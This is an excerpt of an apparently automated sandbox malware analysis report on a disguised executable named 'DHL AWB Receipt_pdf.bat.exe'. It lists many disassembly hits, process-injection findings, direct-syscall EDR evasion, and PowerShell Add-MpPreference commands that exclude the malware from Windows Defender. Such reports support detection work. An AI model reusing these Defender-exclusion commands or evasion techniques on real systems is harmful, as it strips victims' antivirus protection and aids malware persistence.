Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199A9D0 mov eax, dword ptr fs:[00000030h]	9_2_0199A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C49D0 mov eax, dword ptr fs:[00000030h]	9_2_019C49D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A269C0 mov eax, dword ptr fs:[00000030h]	9_2_01A269C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C29F9 mov eax, dword ptr fs:[00000030h]	9_2_019C29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C29F9 mov eax, dword ptr fs:[00000030h]	9_2_019C29F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5A9D3 mov eax, dword ptr fs:[00000030h]	9_2_01A5A9D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01988918 mov eax, dword ptr fs:[00000030h]	9_2_01988918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01988918 mov eax, dword ptr fs:[00000030h]	9_2_01988918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A2892B mov eax, dword ptr fs:[00000030h]	9_2_01A2892B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1892A mov eax, dword ptr fs:[00000030h]	9_2_01A1892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E908 mov eax, dword ptr fs:[00000030h]	9_2_01A0E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0E908 mov eax, dword ptr fs:[00000030h]	9_2_01A0E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1C912 mov eax, dword ptr fs:[00000030h]	9_2_01A1C912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A34978 mov eax, dword ptr fs:[00000030h]	9_2_01A34978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A34978 mov eax, dword ptr fs:[00000030h]	9_2_01A34978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1C97C mov eax, dword ptr fs:[00000030h]	9_2_01A1C97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64940 mov eax, dword ptr fs:[00000030h]	9_2_01A64940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A10946 mov eax, dword ptr fs:[00000030h]	9_2_01A10946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D096E mov eax, dword ptr fs:[00000030h]	9_2_019D096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D096E mov edx, dword ptr fs:[00000030h]	9_2_019D096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D096E mov eax, dword ptr fs:[00000030h]	9_2_019D096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B6962 mov eax, dword ptr fs:[00000030h]	9_2_019B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B6962 mov eax, dword ptr fs:[00000030h]	9_2_019B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B6962 mov eax, dword ptr fs:[00000030h]	9_2_019B6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990887 mov eax, dword ptr fs:[00000030h]	9_2_01990887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1C89D mov eax, dword ptr fs:[00000030h]	9_2_01A1C89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5A8E4 mov eax, dword ptr fs:[00000030h]	9_2_01A5A8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BE8C0 mov eax, dword ptr fs:[00000030h]	9_2_019BE8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC8F9 mov eax, dword ptr fs:[00000030h]	9_2_019CC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CC8F9 mov eax, dword ptr fs:[00000030h]	9_2_019CC8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A608C0 mov eax, dword ptr fs:[00000030h]	9_2_01A608C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3483A mov eax, dword ptr fs:[00000030h]	9_2_01A3483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3483A mov eax, dword ptr fs:[00000030h]	9_2_01A3483A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CA830 mov eax, dword ptr fs:[00000030h]	9_2_019CA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2835 mov eax, dword ptr fs:[00000030h]	9_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2835 mov eax, dword ptr fs:[00000030h]	9_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2835 mov eax, dword ptr fs:[00000030h]	9_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2835 mov ecx, dword ptr fs:[00000030h]	9_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2835 mov eax, dword ptr fs:[00000030h]	9_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2835 mov eax, dword ptr fs:[00000030h]	9_2_019B2835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1C810 mov eax, dword ptr fs:[00000030h]	9_2_01A1C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994859 mov eax, dword ptr fs:[00000030h]	9_2_01994859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994859 mov eax, dword ptr fs:[00000030h]	9_2_01994859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0854 mov eax, dword ptr fs:[00000030h]	9_2_019C0854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A26870 mov eax, dword ptr fs:[00000030h]	9_2_01A26870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A26870 mov eax, dword ptr fs:[00000030h]	9_2_01A26870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1E872 mov eax, dword ptr fs:[00000030h]	9_2_01A1E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1E872 mov eax, dword ptr fs:[00000030h]	9_2_01A1E872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A2840 mov ecx, dword ptr fs:[00000030h]	9_2_019A2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A44BB0 mov eax, dword ptr fs:[00000030h]	9_2_01A44BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A44BB0 mov eax, dword ptr fs:[00000030h]	9_2_01A44BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0BBE mov eax, dword ptr fs:[00000030h]	9_2_019A0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0BBE mov eax, dword ptr fs:[00000030h]	9_2_019A0BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B0BCB mov eax, dword ptr fs:[00000030h]	9_2_019B0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B0BCB mov eax, dword ptr fs:[00000030h]	9_2_019B0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B0BCB mov eax, dword ptr fs:[00000030h]	9_2_019B0BCB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1CBF0 mov eax, dword ptr fs:[00000030h]	9_2_01A1CBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990BCD mov eax, dword ptr fs:[00000030h]	9_2_01990BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990BCD mov eax, dword ptr fs:[00000030h]	9_2_01990BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990BCD mov eax, dword ptr fs:[00000030h]	9_2_01990BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BEBFC mov eax, dword ptr fs:[00000030h]	9_2_019BEBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998BF0 mov eax, dword ptr fs:[00000030h]	9_2_01998BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998BF0 mov eax, dword ptr fs:[00000030h]	9_2_01998BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998BF0 mov eax, dword ptr fs:[00000030h]	9_2_01998BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3EBD0 mov eax, dword ptr fs:[00000030h]	9_2_01A3EBD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A58B28 mov eax, dword ptr fs:[00000030h]	9_2_01A58B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A58B28 mov eax, dword ptr fs:[00000030h]	9_2_01A58B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64B00 mov eax, dword ptr fs:[00000030h]	9_2_01A64B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BEB20 mov eax, dword ptr fs:[00000030h]	9_2_019BEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BEB20 mov eax, dword ptr fs:[00000030h]	9_2_019BEB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A0EB1D mov eax, dword ptr fs:[00000030h]	9_2_01A0EB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01988B50 mov eax, dword ptr fs:[00000030h]	9_2_01988B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A38B42 mov eax, dword ptr fs:[00000030h]	9_2_01A38B42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A26B40 mov eax, dword ptr fs:[00000030h]	9_2_01A26B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A26B40 mov eax, dword ptr fs:[00000030h]	9_2_01A26B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A5AB40 mov eax, dword ptr fs:[00000030h]	9_2_01A5AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198CB7E mov eax, dword ptr fs:[00000030h]	9_2_0198CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A44B4B mov eax, dword ptr fs:[00000030h]	9_2_01A44B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A44B4B mov eax, dword ptr fs:[00000030h]	9_2_01A44B4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A62B57 mov eax, dword ptr fs:[00000030h]	9_2_01A62B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A62B57 mov eax, dword ptr fs:[00000030h]	9_2_01A62B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A62B57 mov eax, dword ptr fs:[00000030h]	9_2_01A62B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A62B57 mov eax, dword ptr fs:[00000030h]	9_2_01A62B57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3EB50 mov eax, dword ptr fs:[00000030h]	9_2_01A3EB50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C8A90 mov edx, dword ptr fs:[00000030h]	9_2_019C8A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EA80 mov eax, dword ptr fs:[00000030h]	9_2_0199EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A64A80 mov eax, dword ptr fs:[00000030h]	9_2_01A64A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998AA0 mov eax, dword ptr fs:[00000030h]	9_2_01998AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01998AA0 mov eax, dword ptr fs:[00000030h]	9_2_01998AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E6AA4 mov eax, dword ptr fs:[00000030h]	9_2_019E6AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01990AD0 mov eax, dword ptr fs:[00000030h]	9_2_01990AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4AD0 mov eax, dword ptr fs:[00000030h]	9_2_019C4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4AD0 mov eax, dword ptr fs:[00000030h]	9_2_019C4AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E6ACC mov eax, dword ptr fs:[00000030h]	9_2_019E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E6ACC mov eax, dword ptr fs:[00000030h]	9_2_019E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E6ACC mov eax, dword ptr fs:[00000030h]	9_2_019E6ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CAAEE mov eax, dword ptr fs:[00000030h]	9_2_019CAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CAAEE mov eax, dword ptr fs:[00000030h]	9_2_019CAAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CCA38 mov eax, dword ptr fs:[00000030h]	9_2_019CCA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B4A35 mov eax, dword ptr fs:[00000030h]	9_2_019B4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B4A35 mov eax, dword ptr fs:[00000030h]	9_2_019B4A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A1CA11 mov eax, dword ptr fs:[00000030h]	9_2_01A1CA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BEA2E mov eax, dword ptr fs:[00000030h]	9_2_019BEA2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CCA24 mov eax, dword ptr fs:[00000030h]	9_2_019CCA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0A5B mov eax, dword ptr fs:[00000030h]	9_2_019A0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A0A5B mov eax, dword ptr fs:[00000030h]	9_2_019A0A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01A3EA60 mov eax, dword ptr fs:[00000030h]	9_2_01A3EA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01996A50 mov eax, dword ptr fs:[00000030h]	9_2_01996A50

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe"
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF48EC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtQueryAttributesFile: Direct from: 0x76EF2E6C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtQuerySystemInformation: Direct from: 0x76EF48CC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtOpenSection: Direct from: 0x76EF2E0C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtDeviceIoControlFile: Direct from: 0x76EF2AEC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtQueryInformationToken: Direct from: 0x76EF2CAC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtCreateFile: Direct from: 0x76EF2FEC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtOpenFile: Direct from: 0x76EF2DCC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtTerminateThread: Direct from: 0x76EF2FCC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtOpenKeyEx: Direct from: 0x76EF2B9C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtSetInformationProcess: Direct from: 0x76EF2C5C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtProtectVirtualMemory: Direct from: 0x76EF2F9C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtWriteVirtualMemory: Direct from: 0x76EF2E3C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtNotifyChangeKey: Direct from: 0x76EF3C2C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtCreateMutant: Direct from: 0x76EF35CC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtResumeThread: Direct from: 0x76EF36AC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtMapViewOfSection: Direct from: 0x76EF2D1C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtTerminateThread: Direct from: 0x76EE7B2E
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtQuerySystemInformation: Direct from: 0x76EF2DFC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtReadFile: Direct from: 0x76EF2ADC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtDelayExecution: Direct from: 0x76EF2DDC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtQueryInformationProcess: Direct from: 0x76EF2C26
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtResumeThread: Direct from: 0x76EF2FBC
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtCreateUserProcess: Direct from: 0x76EF371C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	NtWriteVirtualMemory: Direct from: 0x76EF490C
